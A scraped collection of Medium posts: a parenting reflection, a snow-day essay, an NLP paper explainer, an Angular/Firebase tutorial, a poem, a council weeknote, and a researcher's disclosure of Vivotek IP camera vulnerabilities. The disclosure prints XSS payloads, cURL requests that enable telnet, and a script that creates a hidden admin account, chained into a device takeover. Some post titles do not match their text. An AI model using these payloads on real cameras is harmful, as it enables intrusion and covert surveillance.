https://medium.com/@annissa.manystighosa/what-is-landing-page-and-how-to-optimize-it-e7d36af90af4
|
['Annissa Manystighosa']
|
2020-10-07 02:40:32.326000+00:00
|
['Website Development', 'Landing Page', 'Ecommerce']
|
Parent
|
Wednesday: Describe a decision you’re facing right now. Which path will lead to most growth?
I don’t really know. This question makes me panic, dreading that I may be lost. What if there is no growth on my path- because I feel stagnant now? No growth-leading-path hanging on new decisions at the moment.
I do vow to follow through with the most recent one that I believe will help me grow as a mother, a person, a being.
My little guy is the third boy I’m bringing up. This time my own flesh and blood, his cells unite often to push those hidden buttons, or worse, buttons I thought nonexistent. After raising my voice and threatening punishment countless times, feeling rotten afterwards, I’ve decided to become a better parent. Fury escalates into violence, loss of control. I should know better where that leads to. I remember all too well.
The amount of books and audiobooks one can find at the public library is enormous. I’ve put my name on waiting lists for as many as possible, borrowed as many as I could, and I’m listening, reading and scribbling down things to do, or that I think would help, with every chance I’ve got.
I can now slowly think ahead. I am slowly changing my understanding of my son’s actions and reactions, and I am slowly changing my responses, physical, verbal and in my mind. It’s becoming easier with practice, and I allow a sigh of relief here and there each time there’s the realization of progress.
My son is starting to trust me not only because I am his parent, but because I am love and comfort. He sees me less as the big bad wolf howling demands and more as the womb he came from as life.
|
https://medium.com/know-thyself-heal-thyself/parent-f1f1b23e0929
|
['Georgia Lewitt']
|
2020-12-24 17:38:36.913000+00:00
|
['Parenthood', 'Writing', 'Nonfiction', 'Spirituality', 'Life Lessons']
|
Is There Anything Quite Like a Snow Day?
|
Photo by Jasper Garratt on Unsplash
As a kid growing up in New England snow days were akin to Christmas Eve. You went to bed with the anticipation that the next morning would bring something new, something exciting, something rare.
My childhood bedroom was at the front of the house with windows facing the street. On snowy nights I’d creep out of bed, sometimes at two or three in the morning, and press my face against the window to watch the snow fall. The glow of the streetlights would reflect off the white on the ground and turn the entire street into some sort of surreal yellowish snow globe. The silence would be all-enveloping, that special sort of silence that only exists when it snows.
I’d set my alarm early, like early-early. The morning radio programs usually started at five, and they’d begin first thing with the list of closures or delays. My radio alarm clock was the most adult thing I owned and on these mornings, with the promise of a snow day hanging heavy in the air, it was also the most important thing I owned.
I lived in a town called Plainville and so I had to sit for agonizing hours (that were more likely seconds or minutes) as the DJ read through the list alphabetically. “Avon Public Schools, 2 hour-delay. Berlin Public Schools, cancelled. Bloomfield Public Schools, 2-hour delay.”
I learned to pay attention to the towns that were immediately around us, geography nerd that I was. If Bristol and Farmington and New Britain were cancelled, then things were looking up for us in tiny little Plainville, sandwiched between them. (Our other neighbor Southington was, appropriately, south in both location and alphabet and by then I would have already learned my fate and switched off the radio.)
“Plainville Public Schools, cancelled.”
In my little kid brain that was like winning the lottery. A. Whole. Day. Off. No matter that now, as a grownup, 24 hours passes in the blink of an eye. As a child a snow day meant unlimited possibilities.
We’d spend the day running in and out of the house, pulling on and ripping off snow clothes. We’d have snowball fights where inevitably someone got hit with the icy snowball and started crying. We’d dig intricate, hobbit-like snow forts of the kind they tell kids not to dig these days, with tunnels that felt as though they were 30 feet deep and could collapse on us at any moment. We’d climb over ever-growing snowbanks and wave at the plow drivers as they passed by. Maybe we’d even dare each other to play snow plow-dodge, swearing that we knew of a kid two towns over who died doing it last year.
My dad built a skating rink in our backyard each year, and on some snow days we’d play hockey with neighborhood kids or just skate and push each other into the snow sideboards he’d built up around the perimeter. I wasn’t very good at doing the classic slide-stop on my ice skates so I’d do a little figure-skate spin to slow myself down. It was very queer, though at the time I thought it was a cool and elegant way to stop.
Photo by Mihály Köles on Unsplash
At the end of what seemed like an eternity we’d come inside for dinner, both sweaty and cold at the same time. Sometimes we’d be let out later that night for one last go at the snow; running around the front yard after the sun had set but the world was still lit up in that same yellow glow, not quite daylight but definitely far from dark. Other times we’d watch a movie, drifting off to sleep on the couch, completely exhausted from the day. For my mom, who’d lost a day to herself with the school closure, these post-snow day crashes must have felt like gifts from heaven.
Unless the storm was truly big we’d inevitably be back in school the next day; this was New England, after all. Snow didn’t stop much. Still though, we had that holiday. That escape. That one unstructured day just to go out and be kids.
Even now, in adulthood, I get giddy looking out the window and seeing the big fat flakes drift lazily toward the ground. The promise of what’s to come. The knowledge that when I wake up in the morning the world will have changed.
Snow days are a bit different as an adult, but in a way they can still spark that childhood joy. You still have a bit of an excuse to take some time off, to have some fun. It might mean not changing out of your pajamas while you answer work emails from home and making yourself a cocktail at lunch, or it might mean cozying up in front of the fireplace with a book all morning long. Maybe you take the day and go skiing, or have a Netflix marathon, or just do absolutely nothing except watch the snow fall. It’s the possibility of what could be that makes a snow day so special.
Or maybe you have kids and you’re like my mom, cursing the weather and waiting until they pass out, exhausted from playing in the snow all day.
Either way, is there anything quite like a snow day?
|
https://medium.com/@matt-lardie/is-there-anything-quite-like-a-snow-day-694e6335a2b5
|
['Matt Lardie']
|
2020-12-17 04:31:33.596000+00:00
|
['Winter', 'Snow Day', 'Snow', 'Nostalgia', 'Childhood']
|
EWISE: A New Approach to Word Sense Disambiguation
|
Natural language processing is a difficult task, and the sheer complexity of the English language adds to it. This field therefore tackles many subtasks to get closer to an interpretation that is truly natural. One such subtask is word sense disambiguation, or WSD for short. This article explores this problem and delineates a new approach to solving it, based on the recent outstanding ACL 2019 paper by Kumar, Jat et al.: Zero-shot Word Sense Disambiguation using Sense Definition Embeddings.
What is word sense disambiguation?
The same word can carry different meanings and intentions depending on the context in which it is used. These “difficult” words are generally referred to as homonyms. Take the following example:
He was not feeling well after the marathon. The farmer grabbed the pail from the well.
Both sentences use the word “well,” but they clearly have different senses in each setting.
Word sense disambiguation (WSD) denotes the task of associating a word to its proper definition based on context clues.
RELATED WORK — What approaches exist to solve this problem?
WSD is a well explored problem and many approaches exist to tackle it.
The first category consists of supervised and semi-supervised approaches that treat the definitions as discrete labels. One such supervised approach is context2vec, which uses bidirectional LSTMs to learn generic context embedding functions. This and other supervised models fail to do well on words not included in the training dataset, so unseen and uncommon words cannot be deciphered.
The other type of approach is unsupervised and knowledge-based. One such unsupervised approach is Enhanced Lesk WSD, which uses WordNet to determine the number of shared words between the context of a word and each candidate definition via a word similarity function. However, maximum-overlap heuristics don’t perform as well as supervised approaches.
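To make the overlap heuristic concrete, here is a minimal sketch of a Lesk-style scorer. This is not the Enhanced Lesk algorithm itself and does not use the real WordNet API; the glosses below are toy stand-ins for WordNet entries:

```python
def lesk_overlap(context, definitions):
    """Pick the gloss sharing the most words with the context.

    context: sentence containing the ambiguous word
    definitions: mapping of sense name -> gloss text (toy data here,
    standing in for WordNet glosses)
    """
    context_words = set(context.lower().split())
    best_sense, best_score = None, -1
    for sense, gloss in definitions.items():
        score = len(context_words & set(gloss.lower().split()))
        if score > best_score:
            best_sense, best_score = sense, score
    return best_sense

# Toy glosses for "well" (illustrative, not real WordNet entries)
senses = {
    "well.health": "in good health feeling good",
    "well.hole": "a hole dug in the ground to obtain water",
}
print(lesk_overlap("the farmer grabbed the pail from the well to get water", senses))
# "well.hole" wins here: its gloss shares "the", "to", and "water" with the context
```

The weakness the article notes is visible even in this sketch: the score depends entirely on surface word overlap, so a context that paraphrases the gloss without reusing its words scores zero.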
RELATED WORK — What relevant related approaches can we leverage to improve upon these existing solutions?
WordNet is a large dictionary database for the English language that contains not only various definitions for words, POS tags, and synonyms, but also semantic relations between different words, in a format that machines can easily leverage and use.
To overcome the issue of not being able to get embeddings of rare and unseen words, we need to find a way to predict embeddings of these rare words with those of common words. The paper Learning to Compute Word Embeddings on the Fly helps us do exactly this with an LSTM network and access to dictionary data.
Using the above approaches we can create definition embeddings, but in WSD we still need to effectively connect the input sentences to the embedding outputs. We can leverage the work in Using the Output Embedding to Improve Language Models and use the update rules of word2vec forms to tie weights from input and output models together effectively.
EWISE: Extended WSD Incorporating Sense Embeddings
EWISE is the most recent approach to tackling WSD and overcomes all of the aforementioned shortcomings. It learns a continuous space of sense embeddings as the target, rather than discrete labels, and thus enables generalized zero-shot learning. In other words, EWISE can identify definition mappings for both seen and unseen words.
Architecture
EWISE Architecture
The above architecture diagram has three main stages: attentive context encoding, definition encoding, and knowledge graph embedding.
Definition Encoding in EWISE takes a definition and leverages existing sentence representation models such as InferSent and USE to create a compressed representation of the definition. However, these baseline encodings are not sufficient to generalize to new words.
WordNet’s knowledge graph is used to train the encoder’s parameters. This graph contains nodes of senses and relations between these senses. The definitions are trained on sets of senses with up to 18 types of relations that connect them.
One of two approaches, TransE or ConvE, is used to score the edges between sense embeddings; they are delineated by the equations below:
Modified TransE equation to calculate dissimilarity between two sense embeddings in knowledge graph. q(*): sense embedding passed through definition encoder, h: head node knowledge graph, t: tail node of knowledge graph, e_l: link score to be learned
Modified ConvE equation to score the link between two sense embeddings in the knowledge graph. q(*): sense embedding passed through definition encoder, h: head node, t: tail node, e_l: link score to be learned, e_t: tail score to be learned, w: 2D convolution filters, W: linear transformation (i.e. fully connected layer), f: rectified linear unit (ReLU), vec: vectorized version, x_bar: 2D reshaping
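Since the equation images themselves are not reproduced here, the following is a plausible LaTeX reconstruction from the two captions above. It follows the standard TransE and ConvE scoring forms with the symbols the captions define; treat it as an interpretation, not a verbatim copy of the paper:

```latex
% TransE-style dissimilarity between linked senses h and t
% (lower is better; q(.) is the definition encoder, e_l a learned link embedding):
E(h, l, t) = \lVert q(h) + e_l - q(t) \rVert

% ConvE-style link score (bars denote 2D reshaping, * is 2D convolution,
% f is ReLU, W a linear layer, e_t a learned tail embedding):
\psi(h, l, t) = f\!\left(\mathrm{vec}\!\left(f\!\left([\,\overline{q(h)}\,;\,\overline{e_l}\,] * w\right)\right) W\right) e_t
```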
Now that different senses are connected and their edges scored, these can be extended to create a larger and essentially continuous space of sense embeddings.
Notice how the above two stages have yet to involve the actual input sentences. This is what makes the approach so powerful: the sense embeddings are trained completely independently from the sentence inputs, so even arbitrary inputs can be classified.
Attentive context encoding is where the input comes into play. This encoder generates a context-dependent representation of the input by leveraging a bidirectional LSTM. Each word is represented as a concatenation of the forward and backward hidden states of the sentence. For example:
Input sentence: he wore a tie
Backward: tie a wore he
BiLSTM representation: [he, tie] ; [wore, a] ; [a, wore] ; [tie, he]
This representation is followed by a self-attention layer, detailed more in Vaswani et al (2017), and a fully connected layer to project into the space of sense embeddings.
During training, this representation is multiplied by each sense embedding in the inventory, and the one with the highest score is chosen as the label. Because this is a supervised setting, we can use average cross-entropy loss to tune the model to pick the correct mapping.
Softmax layer following fully connected layer to calculate sense embedding probabilities. v_i: sense embedding of a given input word; b: bias; S: sense inventory
Cross entropy loss function minimized over all annotated words in a batch. z_ij: one hot representation of the target (i.e. correct) sense in inventory S
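As a rough numerical sketch of this objective (illustrative only: the shapes, names, and random vectors below are assumptions, and a real implementation would use a deep-learning framework rather than NumPy):

```python
import numpy as np

def sense_probabilities(context_vec, sense_embeddings, bias):
    """Softmax over dot-product scores between the projected context
    vector and every sense embedding in the inventory."""
    scores = sense_embeddings @ context_vec + bias   # one score per sense
    exp = np.exp(scores - scores.max())              # numerically stable softmax
    return exp / exp.sum()

def cross_entropy(probs, target_index):
    """Negative log-likelihood of the annotated (correct) sense."""
    return -np.log(probs[target_index])

rng = np.random.default_rng(0)
inventory = rng.normal(size=(5, 8))  # 5 senses, 8-dim embeddings (toy sizes)
context = rng.normal(size=8)         # stand-in for the BiLSTM+attention output
bias = np.zeros(5)

p = sense_probabilities(context, inventory, bias)
loss = cross_entropy(p, target_index=2)
```

Averaging this loss over all annotated words in a batch gives the training objective described in the caption above.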
Results
The model is evaluated on how it compares to other state of the art methods as well as its power to generalize to rare and unseen words.
Comparison of overall and part of speech wise F1 scores of EWISE across different test datasets with other state of the art models
EWISE beats all other models across all categories and across all part of speech tags except for adverbs where its F1 score falls just short of GAS.
Comparison of F1 scores of different models based on frequency of annotated words in the train set
The leftmost category, with frequency = 0, represents the zero-shot learning capability of EWISE. In other words, for words it has never seen before it achieves an F1 score of 91, significantly higher than its counterparts. It also performs best across the remaining frequency buckets for rare words. This demonstrates the model’s capacity to classify the word sense of unseen words.
Conclusion
In summary, EWISE is a new approach to the WSD problem that leverages independent training of word sense embeddings and inputs to extend its usability to unseen and rare words. EWISE consistently outperforms all other state of the art WSD models and proves that the model has zero-shot learning capabilities.
|
https://medium.com/analytics-vidhya/ewise-a-new-approach-to-word-sense-disambiguation-c57c5dfa3a87
|
['Kaushik Mahorker']
|
2020-05-05 17:46:32.902000+00:00
|
['NLP', 'Neural Networks', 'Machine Learning', 'Research']
|
Firebase Storage + Angular 10: File Upload/Display/Delete example
|
In this tutorial, I will show you how to make File Upload/Display/Delete with Firebase Storage and Angular 10 with the help of @angular/fire . Files' info will be stored in Firebase Realtime Database.
Firebase Storage + Angular 10 example Overview
We’re gonna build an Angular 10 App that helps us:
upload file to Firebase Storage
see the progress bar with percentage
save file metadata (name, url) to Firebase Realtime Database
display list of files
delete any file in the list
The result in Firebase Cloud Storage:
And Realtime Database:
Following image shows the data flow with Angular Client, Firebase Cloud Storage & Firebase Realtime Database:
- File upload:
store a file to Firebase Cloud Storage
retrieve metadata (name, url) of the file from Firebase Cloud Storage
save metadata (name, url) to Firebase Realtime Database
Display/get/delete files: use the file metadata (name, url) which is stored in Realtime Database as reference to interact with Firebase Storage.
For more details, please visit:
https://bezkoder.com/firebase-storage-angular-10-file-upload/
Further Reading
You can find how to make CRUD operations with Realtime DB or Firestore in the posts:
Or create Angular HTTP Client for working with Restful API in:
Angular 10 CRUD Application example with Web API
Source Code
You can find the complete source code for this tutorial on Github.
|
https://medium.com/@bezkoder/firebase-storage-angular-10-file-upload-4b69289a4151
|
[]
|
2020-12-10 12:53:18.132000+00:00
|
['File Upload', 'Angular', 'Angular 10', 'Firebase Storage', 'Firebase']
|
Something About Why a Robin Sings
|
Turn it once, turn it twice
the lamp won’t light unless you’re patient with it
A calm marigold hue,
I think the extra money spent on those
bulbs made my bedroom walls breathe a sigh of relief
Sometimes, though,
their off-white skin reminds me of when I knew you
Waking up early in the morning, I let the chilly air find a home in my bed.
Freezing my fingertips.
I romanticize the little things -
A lamp, sleeping with the windows open,
cold cold hands.
I remember when I was so good I was over romanticized to the point where you didn’t even recognize me anymore.
I wonder if you are still capable of loving someone to the point where
the red spoons in your utensil drawer turn happily to silver
as if they’d found themselves for the first time
There’s time that I cannot account for — my
brain can’t handle recalling even the good memories sometimes.
Though I want to remember,
I am whole,
I am whole,
I am whole even without them.
After all, it is not the weather that makes a robin sing,
it’s their sarynx.
I am afraid I will not love anyone again -
but there is a note I tacked to my bed frame that
tells me to leave those robins singing for all the right reasons.
|
https://medium.com/@cassidybishop27/something-about-why-a-robin-sings-522ef35d21bd
|
['Cassidy Bishop']
|
2020-12-25 01:21:47.880000+00:00
|
['Poetry', 'Poet', 'Happy', 'Poem', 'Experimental']
|
Buckinghamshire Council Website: Weeknote #15
|
w/c 3rd February
This week we:
Held our seventh show and tell. We covered work being done on the evolving home page design, Libraries service pages and our new “find and apply for a job” service. We also had a guest appearance from Tom Dyson at Torchbox who demo’d the work they’ve been doing recently to make their CMS, Wagtail, and the sites built on it more accessible.
Shared our digital design guidelines with the various third party providers of Buckinghamshire websites. We’re using Zero Height for this which is proving to be pretty neat.
Did some A/B testing of our new homepage design with our user testing panel. We’re trying to make it less cluttered as some earlier feedback told us it was a bit overwhelming. We previously tried hiding some of it under a “show more” button, but then found that users often missed the button, so our new design makes it more obvious. In testing, we found that although more people tended to use the search box when the button was present it didn’t have any impact on how well organised they found the homepage.
Continued rewriting Libraries service content. This should be published in the next sprint and will represent the first service we’ve rewritten content for. We’re only aiming for MVP levels of completion at this point as we need to migrate all services before we can start digging into things in more depth, but the work done on Libraries will help us shape the process we use for further services.
An image comparing the existing and new content for renewing a library loan, that shows the reduction in text
Pulled together the work done on “find and apply for a job” into a first pass, it’s still very much a work in progress (e.g. you can apply filtering to the jobs lists by manipulating the URL but there’s no UI element for it yet), but it does indeed resemble a jobs site.
What we’re thinking about:
How to display long form content like policies and the constitution in an accessible way. The new council comes into being in about 50 days, so we’re getting to the sharp end of getting all of our statutory info up. Unfortunately this is typically presented as 30-page-long PDFs, but Brighton have done a great job of showing a better way of doing things that we can learn from.
Next week:
|
https://medium.com/buckinghamshire-digital-service/buckinghamshire-council-website-9ce880cb6943
|
['Tom Harrison']
|
2020-02-14 16:15:04.038000+00:00
|
['Fixtheplumbing', 'Local Government', 'Localgovdigital', 'Buckinghamshire']
|
Vivotek IP Camera Vulnerabilities Discovered and Exploited
|
Vivotek IP Camera Vulnerabilities Discovered and Exploited
As a personal project, I took it upon myself to research and discover vulnerabilities within various embedded devices, such as a Network Attached Storage (NAS), IP camera, and router. In this blog, I will be going over how I found DOM-based XSS, Persistent XSS, a hidden CGI endpoint to enable services, and how we can use these vulnerabilities to acquire a remote shell on the Vivotek FD8369A-V camera, firmware version 0206b.
Initial Reconnaissance
It is important to realize that the growing amount of services and features in embedded devices has also increased the attack surface available to remote adversaries. Keeping this in mind, let’s gather some information about the camera by using Nmap to enumerate open ports and services running on the FD8369A-V.
PORT STATE SERVICE VERSION
80/tcp open http Boa httpd
443/tcp open ssl/http Boa httpd
554/tcp open rtsp Vivotek FD8134V webcam rtspd
8080/tcp open http Boa httpd
From the resulting information, we can see that the FD8369A-V appears to be hosting a web application interface on a Boa web server, as well as a real-time streaming protocol service for viewing a live video feed from the camera. Nothing out of the ordinary…
Let’s get started by taking a look at the web application and searching for web-based vulnerabilities that can be leveraged to gain access or potentially compromise this device.
Finding DOM-based XSS (CVE-2018–18005)
After successfully authenticating to the camera’s web interface, we are presented with a live video feed from the camera, as well as various configuration settings and navigation options to choose from. Let’s proceed to map the application’s various endpoints while taking note of any potential entry points for injection, such as URL query strings or any client-controlled parameter fields.
One of the endpoints I discovered allowed a user to view the contents of an XML document that was uploaded as an event script as shown below.
https://10.42.4.117/setup/event/event_script.html?index=0
I was curious as to how the index query string parameter was being handled and decided to debug the client-side JavaScript code.
From the snippet above on line 55, we can see that the application is taking a query string parameter, in this case index , and using it within the context of JavaScript’s eval() function. Knowing this, we can supply the following URL to trigger a DOM-based cross-site scripting vulnerability in the context of a victim’s browser through the camera’s web interface.
https://10.42.4.117/setup/event/event_script.html?alert(document.domain)
Clicking the link mentioned above will result in the following.
With that, we now have DOM-based XSS that is triggered when an authenticated user clicks on a maliciously crafted URL containing our payload.
While this is a valid attack vector, it requires more investment as an attacker than we’d like. Since our goal should be to minimize the amount of victim involvement, let’s dig a little deeper and continue our search for vulnerabilities.
Finding Persistent XSS (CVE-2018–18244)
During the process of mapping the camera’s various endpoints and functionality, I discovered that the application supplied verbose log information pertaining to the various backend services and miscellaneous error messages.
Since verbose logging can assist in discovering unexpected application or service behavior, I made sure to keep an eye on it while performing my authorization and additional injection tests. Because of this, I was able to observe that the camera’s logging service also included information regarding unauthorized attempts to access the application’s CGI endpoints. In addition to these “unauthorized access” log messages, the HTTP Referer header from the originating request was being included as well.
Due to the fact that the Referer header is a client-controlled value that can easily be modified using an HTTP intercepting proxy, such as Burp Suite, or a command line utility, such as cURL , an attacker can issue the following cURL request to trigger an “unauthorized access” log message containing a cross-site scripting payload.
curl -i -s -k -X $'GET' \
  -H $'Host: 10.42.4.112' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: http://test.com/test.html?<script>alert(\'XSS TEST\')</script>' -H $'Connection: close' \
  $'http://10.42.4.112/cgi-bin/privilege.cgi'
Issuing the request above will result in the following response, just as we expect.
HTTP/1.1 403 Forbidden
Date: Fri, 05 Oct 2018 20:26:39 GMT
Server: Web Server
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD>
<BODY><H1>403 Forbidden</H1>
Your client does not have permission to get URL /cgi-bin/privilege.cgi from this server.
</BODY></HTML>
Now, when an unsuspecting user visits the camera’s web interface and views the /setup/system/syslog.html endpoint, arbitrary JavaScript will be executed in the context of the user’s browser.
After allowing the page to continue execution, we see the Referer header embedded in the logs.
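The injection request can also be sketched in Python using only the standard library. This is a hedged illustration: the request is built but never sent, purely to show where the client-controlled payload sits:

```python
import urllib.request

PAYLOAD = "<script>alert('XSS TEST')</script>"

# Build (but do not send) the unauthorized request whose Referer header
# carries the payload that the camera later echoes into its syslog page.
req = urllib.request.Request(
    "http://10.42.4.112/cgi-bin/privilege.cgi",
    headers={
        "Referer": "http://test.com/test.html?" + PAYLOAD,
        "User-Agent": "Mozilla/5.0",
    },
)
```

An actual attack would send this with `urllib.request.urlopen(req)` (or cURL, as above); the point is that nothing server-side validates the Referer value before it reaches the log viewer.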
Enabling Hidden Services (CVE-2018–18004)
Ideally, to expedite the search for vulnerabilities in embedded devices, such as the camera, we would enable an SSH service to connect to the device and pull files, such as the camera’s web root directory for static analysis. However, since there is no way to enable such functionality through the camera’s web application interface, we’ll have to refer to the manufacturer’s website for the firmware, which we can obtain here. If Vivotek, Inc. did not publicly provide firmware, we could resort to obtaining a physical shell through the device’s debugging ports. However, since this is not the case we can proceed to download the firmware file from the manufacturer’s website.
Upon downloading the firmware file, I used binwalk, a command line tool used for searching firmware images for embedded files and code, to extract the file system currently in use by the camera.
binwalk -e FD8369A-V-VVTK-0206b.flash.pkg
...
mkdir Demo
...
tar -xvf _FD8369A-V-VVTK-0206b.flash.pkg.extracted/31 -C Demo/
...
binwalk -e Demo/rootfs.img
...
After extracting the camera’s file system from the rootfs.img file, I began to look through the various CGI files and came across one that appeared to allow users to enable or disable various services.
Contents of /cgi-bin/admin/mod_inetd.cgi
#!/bin/sh
strparam=`echo $QUERY_STRING | sed 's/=/ /g'`
/usr/bin/mod_inetd_conf $strparam
echo -ne "Content-type:text/plain\r\n"
echo -ne "Content-length:2\r\n"
echo -ne "\r\n" # end of HTTP header
echo OK
…and the contents of /usr/bin/mod_inetd_conf
#!/bin/sh
#
# Note: This script will turn on/off the listend port of inetd
# If there is no arguments, it will list the /etc/inetd.conf
# example:
#   mod_inetd_conf telnet on  -- turn on the telnetd
#   mod_inetd_conf telnet off -- turn off the telnetd

INETD_CONF="/etc/inetd.conf"
SERVICES="/etc/services"
REAL_INETD_CONF=`realpath $INETD_CONF`
REAL_SERVICES=`realpath $SERVICES`
IS_CHANGED=0

temp_var=`echo $2 | grep 'on'`
if [ -n "$temp_var" ]; then
    sed -i -e "s/^#\($1[[:blank:]].*\)$/\1/" $REAL_INETD_CONF
    IS_CHANGED=1
fi

temp_var=`echo $2 | grep 'off'`
if [ -n "$temp_var" ]; then
    sed -i -e "s/^\($1[[:blank:]].*\)$/#\1/" $REAL_INETD_CONF
    IS_CHANGED=1
fi

if [ $# -ge 3 ]; then
    echo "Change service $1 port to $3"
    sed -i -e "/^$1[[:blank:]]/{s/[0-9][0-9]*/$3/}" $REAL_SERVICES
    IS_CHANGED=1
fi

if [ $IS_CHANGED -eq 1 ]; then
    /etc/init.d/inetd reload
fi
cat $INETD_CONF
From the two files listed above, we can determine that the hidden mod_inetd.cgi endpoint is responsible for enabling various services, specified through a URL query string parameter.
Using this information, let’s enable the telnet service by cURLing the following request so that we can acquire a shell on the device.
curl -i -s -k -X $'GET' \
  -H $'Host: 10.42.4.117' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' -H $'Referer: 10.42.4.117' -H $'Authorization: Basic cm9vdDpUZXN0MTIzIQ==' \
  --data-binary $'\x0d\x0a' \
  $'http://10.42.4.117/cgi-bin/admin/mod_inetd.cgi?telnet=on'
If we cURL the request above, we should see the following.
HTTP/1.1 200 OK
Date: Tue, 23 Oct 2018 00:29:32 GMT
Server: Web Server
Accept-Ranges: bytes
Connection: close
Reloading configuration inetd: .
telnet stream tcp nowait root /usr/sbin/telnetd telnetd -i
Content-type:text/plain
Content-length:2

OK
With that, we now have a telnet service listening on the Vivotek FD8369A-V camera.
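For completeness, the same service-enable request can be sketched in Python with the standard library. Again this is only an illustration: the request is constructed but not sent, and the Base64 value is simply the root:Test123! credential pair used in the cURL command above:

```python
import base64
import urllib.request

# Credentials from the walkthrough: root / Test123!
token = base64.b64encode(b"root:Test123!").decode()

# Build (but do not send) the authenticated GET that flips telnet on via
# the hidden CGI endpoint. The service name and desired state travel in
# the query string, exactly as mod_inetd.cgi expects.
req = urllib.request.Request(
    "http://10.42.4.117/cgi-bin/admin/mod_inetd.cgi?telnet=on",
    headers={"Authorization": "Basic " + token},
)
```

Note how thin the "protection" is: any authenticated user who can reach this CGI path can toggle inetd services, since the endpoint simply passes the query string to mod_inetd_conf.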
Tying it All Together
Although we can enable the Telnet service, doing so requires us to be authenticated. However, if we take advantage of the camera’s various weaknesses, and the fact that the FD8369A-V is vulnerable to persistent XSS, we can store a JavaScript payload that will force the victim’s browser to reach out to an attacker controlled server, embed the contents of a malicious JavaScript file, and create an administrative user on the camera.
If attackers are able to create an administrative account, they could view the live video feed of the camera, modify configuration settings, or enable the Telnet service and obtain a shell on the device.
Let’s proceed to list out the steps an attacker could follow to fully compromise the FD8369A-V.
Step 1. Identify and gain access to communicate with the camera on a public or local network.
Step 2. Host the following JavaScript file on an attacker controlled server that will cause the victim’s browser to issue a request to the endpoint responsible for creating a new user.
var x = new XMLHttpRequest();
x.open("POST", "/cgi-bin/admin/editaccount.cgi", true);
x.send("index=21&tempname=xssUser&userpass=Test123%21&confirm=Test123%21&privilege=admin&username=xssUser&method=add&return=%2F");
Step 3. cURL the following request, containing JavaScript in the Referer header, to the target device.
Step 4. Use social engineering to convince the victim to visit the camera’s vulnerable endpoint (setup/system/syslog.html) containing our malicious payload.
Victim’s client issuing request to retrieve malicious JavaScript source file.
Victim’s client issuing XHR request to create administrative user.
Step 5. When the script has been requested from the attacker controlled server, visit the FD8369A-V’s web interface and log in using the newly created administrative account.
Step 6. cURL the following request to enable the Telnet service, this time using our newly obtained account credentials.
curl -i -s -k -X GET \
  -H 'Host: 10.42.4.117' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' \
  -H 'Referer: 10.42.4.117' \
  -H 'Authorization: Basic eHNzVXNlcjpUZXN0MTIzIQ==' \
  --data-binary $'\x0d\x0a' \
  'http://10.42.4.117/cgi-bin/admin/mod_inetd.cgi?telnet=on'
Step 7. Telnet into the device using our account credentials.
But wait, there is a problem. As it turns out, when a new user is created on the FD8369A-V, the default shell associated with that user is /bin/bash . However, the only shell that the camera supports is /bin/sh . The default root user’s account is the only one with the correct shell enabled. Since the camera does not require knowledge of users’ old passwords when changing them, an attacker can wait for an appropriate time (while not in use) to change the root user’s account password through the web interface, telnet into the device, and change the shell associated with the attacker’s account.
To keep the victim from discovering they have been locked out of the camera and performing a hard reset, an attacker can proceed to modify the camera’s backend to prompt the victim to change their password, or to convince them that their password was changed due to a system update.
Conclusion
In this post, we showed how a remote attacker can potentially compromise the FD8369A-V by using a chain of vulnerabilities found within the camera. Given the ability to communicate with the camera over a network, an attacker can potentially target all of Vivotek, Inc.’s cameras running firmware version 0206b.
Responsible Disclosure Timeline
Initial Contact: October 2, 2018
Vulnerabilities disclosed: October 2, 2018
Vendor response: October 3, 2018
|
https://blog.securityevaluators.com/vivotek-ip-camera-vulnerabilities-discovered-and-exploited-2e2531ecd244
|
['Paul Yun']
|
2019-01-02 16:58:39.358000+00:00
|
['Security Camera', 'Ise Labs', 'IoT', 'Hacking', 'Privacy']
|
PitchTeen: Why student entrepreneurs should be encouraged?
|
We all have joked about not working 9-to-5 or starting your own business over a cup of ramen with your roommates while typing the 5000th line of our assignment that has a deadline in the next 4 hours. But, we never gave it a shot, right?
Studentpreneurs have always intrigued me. Imagine working and paying off all your bills at such a young age — we all love that life, even though it comes with a lot of hard work. Not just that, studentpreneurs also have real advantages:
1. The obvious one, young age: Studentpreneurs are young, probably halfway into college or high school. They have a lot of enthusiasm and time ahead of them. If things go south, they can afford to make a mistake right now; and if they don’t, it’s a win-win for everyone.
2. You gain experience: While running a business, you don’t only learn how to pitch and lead teams. At the same time, you build skills like communication and taking criticism and using it in a constructive, positive way. You learn why things are the way they are.
3. You network with people: You walk into a room full of people you don’t know to pitch your idea (you might have stalked them on LinkedIn). You talk, you pitch, and you talk again. Even without knowing it, you are networking with people in the same industry.
So, give it a try and know, failing is okay.
— Anjali Chaturvedi, Pitchteen
|
https://medium.com/@anjaliichaturvedi/pitchteen-why-student-entrepreneurs-should-be-encouraged-981faa68e89a
|
['Anjali Chaturvedi']
|
2020-12-08 17:45:44.134000+00:00
|
['Tech', 'High School', 'Business', 'STEM', 'Girls In Tech']
|
How many of us are struggling to get this synthesis in place?
|
How many of us are struggling to get this synthesis in place? The only hope for this country is to break free of the 20th century entanglements but that will not be allowed. The oligarchy is a parasite that feeds on us but they are weak. First they had to destroy hope and then destroy faith in our ability to rule ourselves. That allowed them to gain control and then destroy our electoral process while denouncing all social change. Controlled poverty will do the rest. The media has been turned into a propaganda machine and only a grossly distorted charade remains of the rest of the planet for those who are told to trust nothing else.
It will take more than the farce of our complicit, corrupt political parties and another sham election to change this. A clear majority sees the future but we are powerless to change. How can this be?
|
https://medium.com/theotherleft/how-many-of-us-are-struggling-to-get-this-synthesis-in-place-75482c98dda9
|
['Mike Meyer']
|
2018-03-11 23:06:50.418000+00:00
|
['Politics', 'Innovation', 'America', 'Diversity', 'Journalism']
|
British Pathé releases 85,000 films on YouTube
|
